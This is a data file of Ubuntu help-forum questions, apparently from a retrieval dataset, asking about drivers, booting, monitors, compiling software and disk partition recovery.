405670	monitor sleep mode	for my main monitor i use an lg lcd tv but it cant turn it self off when there is no signal ( computer falls asleep ) . it has an rs-232 port for control and i figured out how to turn it off and on with python and pyserial . what id like to be able to do is when my other monitor turns off id like this one to do the same . ive heard allot of people using pm and i tried it but it didnt work ( it seems pm dosnt control monitor off/on in this instance ) . if there is another way to do this what is it and how would i set it up ? also i cant use the normal suspend mode because i have to leave something running in an open terminal window so i have to let it fall asleep ( settings > brightness & lock > turn screen off when inactive ... ) tv-on.py # ! /usr/bin/python import serial port = '/dev/ttyusb0' ser = serial.serial ( port , 9600 , timeout=1 ) ser.write ( `` ka 01 01\r '' ) ser.close tv-off.py # ! /usr/bin/python import serial port = '/dev/ttyusb0' ser = serial.serial ( port , 9600 , timeout=1 ) ser.write ( `` ka 01 00\r '' ) ser.close the original pm script that didnt work # ! /bin/bash case `` $ 1 '' in suspend ) # executed on suspend python /home/sam/tv-off.py ; ; resume ) # executed on resume python /home/sam/tv-on.py ; ; esac
405675	can i use apt-get to swap my android device into ubuntu ?	as they both stand for linux . how can i convert android into ubuntu with apt-get , aptitude and other minimum features ?
405677	wireless missing in toshiba satellite c55d-a5362 - ubuntu 12.10	i recently install ubuntu 12.10 ( gnome ubuntu , to be exact ) on my toshiba satellite c55d-a5362 . the problem is that i can not seem to get the wireless adapter to work . when i check network setting , there was not even a wireless connection ( the wired worked fine , though ) . i suppose that this must be a problem with the driver , but i can not find any . can anyone help me with that ? update thank you . this is the output of 'lspci -nn | grep 0280 ' : 05:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. device [ 10ec:8179 ] ( rev 01 )
405680	i can run ubuntu from my usb thumbdrive but i 'm not sure it 's installed on my thumbdrive	i just followed directions on how to get ubuntu onto a usb thumbdrive using osx . i can restart my macbook air and hold down the alt/option key and boot into ubuntu fine.. but.. ubuntu says it want 's to run an installer.. i am afraid if i do that it 's going to overwrite my internal harddrive and brick my macbook air ... or at least overwrite my osx filesystem - ... is it safe to run the installer ? will it complete installation in some way on the usb thumbdrive and make it so if i want to run ubuntu i just boot into the thumbdrive and i 'm off to the races ? after doing some more reading here it looks like i need to get a second usb thumbdrive and use the installer on the first drive to install ubuntu 'for real ' onto the second drive so that i 'm not always in 'live ' mode ? is that correct ? thanks ! i hope my question is clear .
405681	how should i upload my .vcf contacts to thunderbird ?	i have configured thunderbird . now i want to import my .vcf contact file to thunderbird . what should i do to import it ?
405685	are ubuntu and/or unity foss ?	as the title states , are ubuntu and/or unity open source software ?
405689	compose key wo n't enable	right now , i 'm trying to enable my compose key to type characters with accents . it wont enable . i 'm in the system settings panel , and all it says is : compose key ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... disabled however , when i click on one that does have something currently in it , it gives me the option to create a new one : switch to previous source ... ... ... ... ... ... ... ... ... ... ... new accelerator it never shows the option to define a `` new accelerator '' for the compose key , rather it just stays in the 'disabled ' mode . please help ! running : ubuntu 13.10 computer : acer aspire 5250 all updates are enabled , except for preliminary .
405691	dual video card , dual monitor setup crashes x on ubuntu 13.10	my setup is the following : ubuntu 13.10 , i7-4770k , nvidia geforce 210 . i have the hdmi port of the intel chip connected to a 4k monitor ( 3840x2160 ) and the dual-link dvi output of the geforce connected to a 2560x1600 monitor . by default both displays are recognized and enabled in landscape mode ( with some weird mouse flickering ) , however physically the 2560 monitor is in portrait mode . when i use the `` screen display '' ui or xrandr to rotate the display , x crashes and i 'm sent to the login screen . x log can be found here : http : //paste.ubuntu.com/6753901/ i 'm currently using the nouveau drivers , when i tried to use the proprietary ones i could n't get the nvidia connected display to be recognized at all .
405694	strange characters ( ^ [ [ a ) on cygwin command line when i ssh into a ubuntu vm	up arrow produces ^ [ [ a and down arrow produces ^ [ [ b these look like asci escape codes . i do n't get this problem when i am working outside of the ssh session . also , when i sudo su in the ssh session to a different user i do not have this issue . it seems i may have some problems with my ubuntu user account ?
405695	wubi start up error , grub menu boot error !	need a bit of help with the wubi windows ubuntu installer ( 12.04 lts ) . basically i am using a separate external drive for the ubuntu os for installation . once done i rebooted and it took me to the grub menu were i may choose what os to boot up into ( dual boot ) but when i choose ubuntu it will state an error saying `` missing or corrupted file : g : \ubuntu\winboot\wubildr.mbr '' although i checked the directory and the file was in the correct folder ! i have tried to re-install many times but does not seem to work . any feedback is greatly appreciated ! please try respond as soon as possible , i 've been searching for solutions to the problem and have been unsuccessful in my own efforts : (
405696	unable to get pci ethernet connected on ubuntu 12.04 server	first off , it might be useful to explain that my local network setup is : [ internet ] < -- - > [ 192.168.1.1 ] < -- - > [ 10.10.10.1 ] < -- - > [ computer ] so , the router at 10.10.10.1 is the computer 's gateway and router 192.168.1.1 handles dns requests . ~~~~~ i installed ubuntu 12.04 server on the computer in question , but i ca n't seem to get the ethernet connection working properly . here 's the info that i would think would be useful : user @ samserver1 : ~ $ lspci | grep eth 00:03.0 ethernet controller : digital equipment coporation decchip 21140 [ fasternet ] ( rev 22 ) ~~~~~ user @ samserver1 : ~ $ ifconfig eth0 eth0 link encap : ethernet hwaddr 00:00:65:19:1f : e3 inet addr:10.10.10.2 bcast:10.10.10.15 mask:255.255.255.240 up broadcast multicast mtu:1500 metric:1 rx packets:0 ettors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:3 dropped:0 overruns:0 carrier:3 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) ~~~~~ user @ samserver1 : ~ $ cat /etc/network/interfaces # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 10.10.10.2 netmask 255.255.255.240 gateway 10.10.10.1 dns-search 192.168.1.1 dns-nameservers 192.168.1.1 ~~~~~ user @ samserver1 : ~ $ route kernel ip routing table destination gateway genmask flags metric ref use iface default 10.10.10.1 0.0.0.0 ug 100 0 0 eth0 10.10.10.0 * 255.255.255.240 u 0 0 0 eth0 ~~~~~ user @ samserver1 : ~ $ ping -c 1 10.10.10.1 ping 10.10.10.1 ( 10.10.10.1 ) 56 ( 84 ) bytes of data . from 10.10.10.2 icmp_seq=1 destination host unreachable -- - 10.10.10.1 ping statistics -- - 1 packet transmitted , 0 received , +1 errors , 100 % packet loss , time 0ms ~~~~~ user @ samserver1 : ~ $ ping -c 1 www.google.com ping : unknown host www.google.com ~~~~~ any advice would be greatly appreciated , and let me know if there 's any useful info that i left out . ps : i did make sure that address 10.10.10.2 was reserved on the router for the server 's mac address pps : trimmed output of `` lspci -vvv '' 00:03.0 ethernet controller : digital equipment corporation decchip 21140 [ fasternet ] ( rev 22 ) subsystem : cogent data technologies , inc. device 2500 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 66 ( 5000ns min , 10000ns max ) , cache line size : 32 bytes interrupt : pin a routed to irq 3 region 0 : i/o ports at 1000 [ size=128 ] region 1 : memory at 44000000 ( 32-bit , non-prefetchable ) [ size=128 ] [ virtual ] expansion rom at 18000000 [ disabled ] [ size=256k ] kernel driver in use : tulip kernel modules : tulip
405699	does apt-get stop working after support ends ?	i have a system with ubuntu 10.10 , and many packages will not install with apt-get anymore ( the error says `` not found ip '' ) although those packages still install under 10.04 lts . ( this is after performing `` apt-get update '' ) so is that what happens after support for a version like 10.10 expires ? is the repository no longer maintained so that we ca n't `` apt-get install '' anymore ? if so , when will that happen to 10.04 ? or is there something i can do to keep it from breaking ? ( please no comments about how i need to update to the latest version , i have reasons for needing to keep older versions active as well )
405701	nothing happens when i click the dash button in ubuntu 13.10 update : solved it !	it does n't even gray out the background as i 've read in some questions here , it just makes whatever program i 'm using appear as if it 's below another window and the top bar becomes blank . any ideas on how to fix this ? update : okay so here is what is happening . i am using a laptop and an external monitor . when i have them as individual displays ( not mirrored ) and have the dash in the external display , and from there go to mirrored display , the dash just is n't there , but when i am in dual display with the dash on the built-in display , and from that go to mirrored display , i can use the dash . not quite sure if it 's a bug or what .
405704	alt+tab task switcher on all monitors	i 'm on ubuntu 12.04 gnome classic and using dual monitors . in this set up i see the task switcher ( activated with alt+tab ) is shown only in the monitor with the mouse pointer . does anybody know how to make it appear on all monitors ?
405705	screen emulation is not available on this page	i just updated google-chrome-stable to version 32.0.1700.77 in my ubuntu 13.04 . i tried to use this renamed feature , now called screen emulation , so i set the resolution to different values , but all i got was this message : screen emulation is not available on this page i ca n't confirm if is it working for other os/chrome versions setup , but i 'm pretty sure that it may be a problem with google chrome for linux . also i ca n't find discussion , blog post or even chrome changelog . is it a bug or is it something in ubuntu ?
405708	how to make a .sqfs file	i 've created an ubuntu 13.10 server 64-bit installation using a live cd . i want to backup the installation as a .sqfs file . i 'm confused about how to do so . i looked at : http : //manpages.ubuntu.com/manpages/maverick/man1/mksquashfs.1.html and http : //tldp.org/howto/squashfs-howto/mksqoverview.html but there are no examples . i want to make an image that is n't compressed . do i need to install anything in order to make a squashfs ? i 'm thinking it 's something like this to create the sqfs file : sudo mksquashfs /theubuntuinstall ... /theplaceimsavingto [ -nod -noi -nof ]
405711	i am trying to install ubuntu 12.04 from a flash drive on a second drive	i have ubuntu 12.04 installed on a bootable flash drive . it runs fine in try ubuntu mode . i added a second sata hard drive to my pc and try to install ubuntu on that drive . i boot from flash drive and select install , later select the 80gb drive to install ubuntu . this drive is empty and formatted in fat32 , i select ext4 filesystem and create a 70mb partition , and a second partition 10mb for swap on the same drive . installation works ok and installs ubuntu ok , but when i reboot and press f11 and select the 80gb hard drive for boot , the screen displays out of range error . my pc has nvidia 6350 on-board graphics . once i booted from hiren 's boot cd , edited grub , and changed the line with the screen resolution , i deleted # at the beginning of the line and set the resolution to 1024x768 , but it did n't work .
405712	how to convert a livecd into a vmlinuz and initrd to pxe boot load slowly	i need to make a emergency pxe bootloader for a livecd ( not the ubuntu netboot small cd , but rather a desktop livecd to boot from the command line ) . will this work : # create a cpio archive of just the iso and append it to the initrd image . ( echo `` ubuntu-13.10-desktop-amd64.iso '' | cpio -h newc -- quiet -o ) | gzip -9 | cat ubuntu-13.10-desktop-amd64.iso_extracted/casper/initrd0.img - > tftpboot/initrd0.img # kernel image . cp ubuntu-13.10-desktop-amd64.iso_extracted/isolinux/vmlinuz0 tftpboot/vmlinuz0 # pxelinux bootloader part : label pxeboot kernel vmlinuz0 append initrd=initrd0.img root=/ubuntu-13.10-desktop-amd64.iso rootfstype=iso9660 rootflags=loop onerror localboot 0 what am i doing wrong ?
405714	wifi host for android phone	i have ubuntu 12.04 on my laptop and i access internet on my laptop through a proxy server . i was trying to set up a hotspot for my android phone ( samsung galaxy ace ; os : android v2.3 , gingerbread ) , following the steps as mentioned in the following link . http : //thenewbieblog.wordpress.com/2012/05/01/wifi-hotspot-setup-on-ubuntu/ though now i am able to connect to the hotspot using a static ip , i do n't have access to internet either through the browser or on any of the apps . what could be the problem ?
405717	installing ubuntu over windows 8.1	i installed ubuntu last night on my laptop . i was using windows 8.1 , how can i remove my previous windows and how can i view my c : drive .
405724	install xgoogle python module on ubuntu	i recently moved from windows to linux and i trying to install xgoogle in ubuntu . i am just a beginner with linux and command line so i follow up the installer in python x install . but its seem that python do n't recognize the module after install . it create an egg file and open it , then its create easy-install.pth file somewhere in /usr/local/lib/python2.7/dist-packages/ . i support to do something with that ? it seem that just copy and install the packet to the lib floor not provide me the module , what more should i do ? i provide the install log to help you understand better what i did there . sudo python '/home/or/python/xgoogle-master/setup.py ' install running install checking .pth file support in /usr/local/lib/python2.7/dist-packages/ /usr/bin/python -e -c pass test passed : /usr/local/lib/python2.7/dist-packages/ appears to support .pth files running bdist_egg running egg_info writing xgoogle.egg-info/pkg-info writing top-level names to xgoogle.egg-info/top_level.txt writing dependency_links to xgoogle.egg-info/dependency_links.txt warning : manifest_maker : standard file 'setup.py ' not found reading manifest file 'xgoogle.egg-info/sources.txt ' writing manifest file 'xgoogle.egg-info/sources.txt ' installing library code to build/bdist.linux-i686/egg running install_lib warning : install_lib : 'build/lib.linux-i686-2.7 ' does not exist -- no python modules to install creating build/bdist.linux-i686/egg creating build/bdist.linux-i686/egg/egg-info copying xgoogle.egg-info/pkg-info - > build/bdist.linux-i686/egg/egg-info copying xgoogle.egg-info/sources.txt - > build/bdist.linux-i686/egg/egg-info copying xgoogle.egg-info/dependency_links.txt - > build/bdist.linux-i686/egg/egg-info copying xgoogle.egg-info/not-zip-safe - > build/bdist.linux-i686/egg/egg-info copying xgoogle.egg-info/top_level.txt - > build/bdist.linux-i686/egg/egg-info creating 'dist/xgoogle-1.3-py2.7.egg ' and adding 'build/bdist.linux-i686/egg' to it removing 'build/bdist.linux-i686/egg ' ( and everything under it ) processing xgoogle-1.3-py2.7.egg removing '/usr/local/lib/python2.7/dist-packages/xgoogle-1.3-py2.7.egg ' ( and everything under it ) creating /usr/local/lib/python2.7/dist-packages/xgoogle-1.3-py2.7.egg extracting xgoogle-1.3-py2.7.egg to /usr/local/lib/python2.7/dist-packages xgoogle 1.3 is already the active version in easy-install.pth installed /usr/local/lib/python2.7/dist-packages/xgoogle-1.3-py2.7.egg processing dependencies for xgoogle==1.3 finished processing dependencies for xgoogle==1.3 i asked this question in stack overflow first , but it seem they think that it 's not the place for asking about install new modules . i copy the module to /usr/lib/python2.7 and give it permissions . when i start the 2.7 idle i can load it . but when i try to load it from the shell with `` python '' or `` python2.7 '' python not recognize it . do i need to add it to some path or something ?
405725	waiting for network config and purged network manager in 12.04	i am very new to ubuntu and i love it dearly , however recently i had an error pop up which said : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_binary-i386_packages , e : the package lists or status file could not be parsed or opened . ' a few weeks later i lost my wi-fi connection . i ended up purging software manager and this message disappeared but without network manager everything went down hill . i ca n't reinstall it as i have no internet connection on my lap top . also another error appeared in its place it is a red triangle with an exclamation mark . now also an error returned `` waiting for network configuration , which causes a very slow boot . i have tried all sorts of commands and nothing works , i have been researching all these problems for a week and trying different things , making the problem larger than i started with . network manager comes back with all sorts of massages , like access denied . i am freaking out that i completely stuffed the system up . i have copies of all the commands i have tried and the responses from the terminal . would anyone be willing to help me please ?
405728	how to install wireless adopter driver on ubuntu 12.04 ?	i just recently installed ubuntu on my lenovo thinkpad e540 , now i can not figure out how to install the driver for the wireless adopter . i 've seen people with the exact same computer and have the wifi working , so there must be a way to install it . please help . thanks
405729	in first step of ubuntu installation : crash screen	i am a java programmer and i want to install ubuntu 13.10 to use for my programming needs . but i have a problem . on my first step of installing ubuntu x86 ( i am a newbie ) when i go to setup screen in boot , the screen will crash : but on another pc this works fine . monitor : crt 17-inch ( might this be the problem ? ) cpu : intel dual e2200 2.2 x86 ram : 2gb graphics card : nvidia 9500gt
405732	clean install of xubuntu over ubuntu : will grub continue to work ?	i installed ubuntu 13.10 a few days ago , and had to use boot-repair to get dual boot ( with windows 8.1 on a computer with uefi ) working properly , setting up grub and all that . but i kind of do n't like unity , and would like to use xfce instead . i 'm debating being lazy and just using xubuntu-desktop versus doing a fresh install of xubuntu , but in the event that i do a fresh install , would i have to run boot-repair once more or would grub and the booting process remain intact and be able to boot xubuntu immediately ?
405733	elements 1tb hdd wont mount - 12.4 unbutu fresh and updated install	returning fault may be a faulty disc ? wont mount ? ( sounds non sexy ) maybe faulty disc ? is not though ... ... .. - plugged back into windows 7 laptop , did chk disc , all working fine plugged back in to differing usb 2 port on the toshiba satellite with ubuntu freshly loaded and updated - same wont mount fault fresh 12.4 install and updated - video sorted - ( ex vista bluh ) gives instructions - but being new to this good looking os and not at all technical is like - where is that and what do i do - double dutch past the disc may be faulty bit ? a plain english answer and directions would be wonderful please ? ta
405734	ubuntu on hp envy 14-2050se	i am now using laptop hp envy 14-2050se model . i think ubuntu would give me a better performance . however , i am surfing a pile of websites including ubuntu web but i ca n't find whether my model is compatible with ubuntu . is there ubuntu able to install on my laptop ? thanks in advance to anyone who answers my question .
405735	installing multiple linux distros in a single partition	i 'm currently using ubuntu 13.04 , elementaryos and windows 8 . i would also like to install backtrack for rare use . but , i 'm already out of my partition limit . so , was it possible to combine two partitions and install all the linux distros in that single partition with a shared swap ?
405739	move files to usb drive using right click	when i insert an usb drive , i want a right click menu ( contextual menu ) by which i will be able to copy / move files between harddisk and usb drive similar to the send to menu in windows . in ubuntu 12.04 , even though copy to and move to options are available , i do not find option to copy to or move to usb drive even though the drive is mounted . ( i am able to copy/paste or cut/paste though it does not appeal to me as an elegant solution )
405741	building my own kernel for live-usb	i m building my own kernel , which i want to install on a usb , so making it live usb . i have downloaded a kernel source named precise and compiled it . i followed the tutorial given in this following link : https : //help.ubuntu.com/community/kernel/compile # altbuildmethod after compilation , *.deb packages have been created of linux source directory ( in this example , they are placed in ~/src because our linux source directory is ~/src/ubuntu-precise ) . i followed the above document till : alternate build method : the old-fashioned debian way as a result of this i got some *.deb files . names of *.deb files are given as : > /home/msz/src/linux-libc-dev_3.2.54-2_amd64.deb > /home/msz/src/linux-firmware-image_3.2.54-1_amd64.deb > /home/msz/src/linux-firmware-image_3.2.54-2_amd64.deb > /home/msz/src/linux-headers-3.2.54_3.2.54-1_amd64.deb > /home/msz/src/linux-headers-3.2.54_3.2.54-2_amd64.deb > /home/msz/src/linux-image-3.2.54_3.2.54-1_amd64.deb > /home/msz/src/linux-image-3.2.54_3.2.54-2_amd64.deb > /home/msz/src/linux-libc-dev_3.2.54-1_amd64.deb also i got one folder in the same directory where the above files are found . this folder called ubuntu-precise which has many folders and files including .o files and vmlinuz . now instead of installing it on my hard disk , i want to install this particular linux on usb drive . i do n't have *.iso files so universal usb installer ca n't be used . so , how can i proceed to install this custom linux on usb with above mentioned *.deb files another question is why i am getting 8deb files with amd as suffix , when actually i am having intel processor .
405742	huawei ec306 ( tata photon max ) is not working on ubuntu 13.10	i 've just installed huawei ec306 dongle in ubuntu 13.10 as described in user manual and provided software in data card . i executed script : sudo ./install_linux from application provided in dongle memory above script installs application mobilepartner successfully . after restarting system , mobilepartner automatically appers on screen when data card plugs . but the problem is it does not detects device and triggers a message `` please insert the device to make a connection '' i also tried this solution but this also does not works ! http : //ubuntuforums.org/showthread.php ? t=1814583 lsusb output is : bus 002 device 004 : id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 0bda:58c1 realtek semiconductor corp . bus 001 device 004 : id 0a5c:21bc broadcom corp. bcm2070 bluetooth 2.1 + edr bus 001 device 012 : id 045e:0783 microsoft corp . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub see this screenshot :
405743	ca n't turn on my webcam	i can not turn on my webcam to make , for example , a video call . thanks in advance .
405746	system-wide scaling of user interface in ubuntu ( 13.10 x64 or any variant ) ?	does ubuntu contain a feature for system-wide ( dpi ) scaling which can scale the entire user interface while maintaining proportionality between interface elements ? if not , can this be achieved ? if not , can this idea be submitted and does there exist an alternative solution ?
405750	webcam stopped working	built in webcam stopped working somewhere around december 10-20 i have 64bit 12.04 on lenovob575 i usually install updates on realese , webcam used to work ( defficiently ( reeeally dark image ) but we loved each other ) , now it is n't even detected . gucview says could not open device chesse says no device found no traces of webcam at lsusb or lspci or lshw ( i thnk ) how can i recognize it at var/log/syslog ? any other suggestion is also appreciated . pd1 : there are other questions with title `` webcam stopped working '' but they are old ( > 1y ) and talk about a kernel update broking webcams is it happening again ? pd2 : i also recall some discussion about built in webcams treated as usb , i also have some problems detecting certain usb drives ( a not exactly new markvision , sounds like i should make it to not use ehci_hcd somehow ) could it be related ?
405754	how to install ubuntu on vmware workstation ?	i have tried to install ubuntu on a vmware workstation , but once finished it entered the console and not the ui of ubuntu , and it was installed with a root user . i would like to change this to access ubuntu as a normal user
405755	how to develop a windows program ?	i have just started using ubuntu , but i need to develop an application , something small that can run on my work computer which has to run windows 7 . i need to make a application for my work that has client/server capabilities , a single networked database and the ability for employees to change database content and then submit forms . are there any ides out there that can do something like build programs for windows , like visual basic/studio ? if the answer to the above question is `` no '' , then what is the easiest language to learn for development on ubuntu ?
405758	how to deal with error in make png command ?	this is my source code . i should compile it to create some .exe files : -- -- -- -- -- -- -- -- -- -- -- -- - for library -- -- -- -- -- -- -- -- -- -- -- -- - asc : cd $ ( src_lib_dir ) $ @ ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' image : cd $ ( src_lib_dir ) $ @ ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' io : cd $ ( src_lib_dir ) $ @ ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' postprocess : cd $ ( src_lib_dir ) $ @ ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' preprocess : cd $ ( src_lib_dir ) $ @ ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' runoff : cd $ ( src_lib_dir ) $ @ ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' runoff_others : cd $ ( src_lib_dir ) $ @ ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' statistics : cd $ ( src_lib_dir ) $ @ ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' -- -- -- -- -- -- -- -- -- -- -- -- - for executable file -- -- -- -- -- -- -- -- -- -- -- -- - executables : chmod 754 $ ( bin_dir ) *.sh ; \ cd $ ( src_bin_dir ) ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; \ make -f makefile2 cc= $ ( cc ) cflags= '' $ ( cflags ) '' fc= $ ( fc ) fcflags= '' $ ( fcflags ) '' ; \ cd btop ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' fc= $ ( fc ) fcflags= '' $ ( fcflags ) '' ; \ cd ../sw ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; make install ; \ cd ../yhym_sup ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; make cp ; -- -- -- -- -- -- -- -- -- -- -- -- - option ( png related ) -- -- -- -- -- -- -- -- -- -- -- -- - png : cd $ ( src_lib_dir ) image ; \make -f makepng cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; \ cd ../../bin ; \ make y_asc2png cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; \ make y_asc2png2mm cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; \ make y_mkpng_point_facc cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; \ make y_asc2png_all cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; \ after typing `` make png '' command i get the below error : cd src/lib/image ; \make -f makepng cc=gcc cflags= '' -o2 -wall -d_largefile_source -d_file_offset_bits=64 '' ; \ cd ../../bin ; \ make y_asc2png cc=gcc cflags= '' -o2 -wall -d_largefile_source -d_file_offset_bits=64 '' ; \ make y_asc2png2mm cc=gcc cflags= '' -o2 -wall -d_largefile_source -d_file_offset_bits=64 '' ; \ make y_mkpng_point_facc cc=gcc cflags= '' -o2 -wall -d_largefile_source -d_file_offset_bits=64 '' ; \ make y_asc2png_all cc=gcc cflags= '' -o2 -wall -d_largefile_source -d_file_offset_bits=64 '' ; \ -- -- -- -- -- -- -- -- -- -- -- -- - make [ 1 ] : entering directory `/home/mahsa/btopmc/source/yhym/src/lib/image ' gcc -c -o2 -wall -d_largefile_source -d_file_offset_bits=64 make_png256_2.c make_png256_2.c:7:16 : fatal error : gd.h : no such file or directory compilation terminated . make [ 1 ] : *** [ ../../../lib/image.a ( make_png256_2.o ) ] error 1 make [ 1 ] : leaving directory `/home/mahsa/btopmc/source/yhym/src/lib/image ' make [ 1 ] : entering directory `/home/mahsa/btopmc/source/yhym/src/bin ' make -f y_asc2png.make cc=gcc cflags= '' -o2 -wall -d_largefile_source -d_file_offset_bits=64 '' make [ 2 ] : entering directory `/home/mahsa/btopmc/source/yhym/src/bin ' gcc -o ../../bin/y_asc2png.exe y_asc2png.o ../../lib/image.a ../../lib/libasc.a -o2 -wall -d_largefile_source -d_file_offset_bits=64 -lgd /usr/bin/ld : can not find -lgd collect2 : error : ld returned 1 exit status make [ 2 ] : *** [ ../../bin/y_asc2png.exe ] error 1 make [ 2 ] : leaving directory `/home/mahsa/btopmc/source/yhym/src/bin ' make [ 1 ] : *** [ y_asc2png ] error 2 make [ 1 ] : leaving directory `/home/mahsa/btopmc/source/yhym/src/bin ' make [ 1 ] : entering directory `/home/mahsa/btopmc/source/yhym/src/bin ' make -f y_asc2png2mm.make cc=gcc cflags= '' -o2 -wall -d_largefile_source -d_file_offset_bits=64 '' make [ 2 ] : entering directory `/home/mahsa/btopmc/source/yhym/src/bin ' gcc -o ../../bin/y_asc2png2mm.exe y_asc2png2mm.o ../../lib/image.a ../../lib/libasc.a -o2 -wall -d_largefile_source -d_file_offset_bits=64 -lgd /usr/bin/ld : can not find -lgd collect2 : error : ld returned 1 exit status make [ 2 ] : *** [ ../../bin/y_asc2png2mm.exe ] error 1 make [ 2 ] : leaving directory `/home/mahsa/btopmc/source/yhym/src/bin ' make [ 1 ] : *** [ y_asc2png2mm ] error 2 make [ 1 ] : leaving directory `/home/mahsa/btopmc/source/yhym/src/bin ' make [ 1 ] : entering directory `/home/mahsa/btopmc/source/yhym/src/bin ' make -f y_mkpng_point_facc.make cc=gcc cflags= '' -o2 -wall -d_largefile_source -d_file_offset_bits=64 '' make [ 2 ] : entering directory `/home/mahsa/btopmc/source/yhym/src/bin ' gcc -o ../../bin/y_mkpng_point_facc.exe y_mkpng_point_facc.o ../../lib/image.a ../../lib/libasc.a -o2 -wall -d_largefile_source -d_file_offset_bits=64 -lgd /usr/bin/ld : can not find -lgd collect2 : error : ld returned 1 exit status make [ 2 ] : *** [ ../../bin/y_mkpng_point_facc.exe ] error 1 make [ 2 ] : leaving directory `/home/mahsa/btopmc/source/yhym/src/bin ' make [ 1 ] : *** [ y_mkpng_point_facc ] error 2 make [ 1 ] : leaving directory `/home/mahsa/btopmc/source/yhym/src/bin ' make [ 1 ] : entering directory `/home/mahsa/btopmc/source/yhym/src/bin ' make -f y_asc2png_all.make cc=gcc cflags= '' -o2 -wall -d_largefile_source -d_file_offset_bits=64 '' make [ 2 ] : entering directory `/home/mahsa/btopmc/source/yhym/src/bin ' gcc -o ../../bin/y_asc2png_all.exe y_asc2png_all.o ../../lib/image.a ../../lib/libasc.a -o2 -wall -d_largefile_source -d_file_offset_bits=64 -lgd /usr/bin/ld : can not find -lgd collect2 : error : ld returned 1 exit status make [ 2 ] : *** [ ../../bin/y_asc2png_all.exe ] error 1 make [ 2 ] : leaving directory `/home/mahsa/btopmc/source/yhym/src/bin ' make [ 1 ] : *** [ y_asc2png_all ] error 2 make [ 1 ] : leaving directory `/home/mahsa/btopmc/source/yhym/src/bin ' make : *** [ png ] error 2
405759	ca n't boot into windows 7 efi gpt after recovery operation	my question , or rather issue , is in the extent of this previous case in which i wanted to grow my linux ( ext4 ) partition . the partition /dev/sda6 was in the way of doing this and since it contained bios_grub i did n't touch it until someone with expert knowledge could help me . as suggested by the helper i deleted the highlighted partition /dev/sda6 all seemed well the partition was successfully removed so i went on to step 3 , merging /dev/sda7 ( the ext4 containing everything ubuntu ) with the unallocated partition to grow my linux partition . everything still seemed to be going the right way so everything went well . the helper suggested to turn swappoff on /sda8 during the process , so i did . gparted kept on merging the two partitions , which i think was a good thing , as well as refreshing itself to find all the partitions after turning swapoff . when gparted finally refreshed , the program just stopped and shut itself down while it was still in the middle of growing /dev/sda7 . i restarted gparted to find this : mini heart attack now i 'm running sudo testdisk from ubuntu live dvd session , performing a deeper search on the hard drive . i did this yesterday allready , but i realized fixing this was a little , if not way over my head . so please , if you have the time ( but especially the knowledge to help me with this ( preferably in real time through chat or anything ) ) , help me liberate myself from this torment ... edit : 'new ' information : extra information if needed edit : testdisk results output of fdisk in terminal : ubuntu @ ubuntu : ~ $ sudo fdisk -l /dev/sda warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0fb2bbaa disk /dev/sda does n't contain a valid partition table ubuntu @ ubuntu : ~ $ output of gdisk in terminal : ubuntu @ ubuntu : ~ $ sudo gdisk -l /dev/sda gpt fdisk ( gdisk ) version 0.8.1 caution : invalid main gpt header , but valid backup ; regenerating main header from backup ! caution ! after loading partitions , the crc does n't check out ! warning ! main partition table crc mismatch ! loaded backup partition table instead of main partition table ! warning ! one or more crcs do n't match . you should repair the disk ! partition table scan : mbr : not present bsd : not present apm : not present gpt : damaged found invalid mbr and corrupt gpt . what do you want to do ? ( using the gpt may permit recovery of gpt data . ) 1 - use current gpt 2 - create blank gpt your answer : i answered with 1 and testdisk gave me these results : after further exploration , testdisk ( while selecting my hard disk as gpt efi ) showed that all of my files on partitions [ os ] , [ data ] and [ recovery ] where perfectly in tact . the unlabeled partitions are respectively 2 linux partitions containing data ( a lot of it is damaged , but thats not the upmost priority at the moment ) and one swap partition . at the moment i am copying the whole hard disk to an external hard disk to prepare for any probable error when fiddling with testdisk to try and recover the system . edit 13 februari 2014 : at the moment my setup looks like this . i have some confusion over my hard disk , was it mbr or gpt to begin with ? anyway , some last steps to be taken care of , i hope someone can help me ! ubuntu is booting from grub and/or refind but windows 7 just does n't boot . i tried with every boot repair option i could find ( about windows 7 ) but untill now everything has failed . - boot with windows 7 boot repair cd and enter command prompt environment - i tried the commands : bootrec /fixmbr , bootrec /fixboot , bootrec 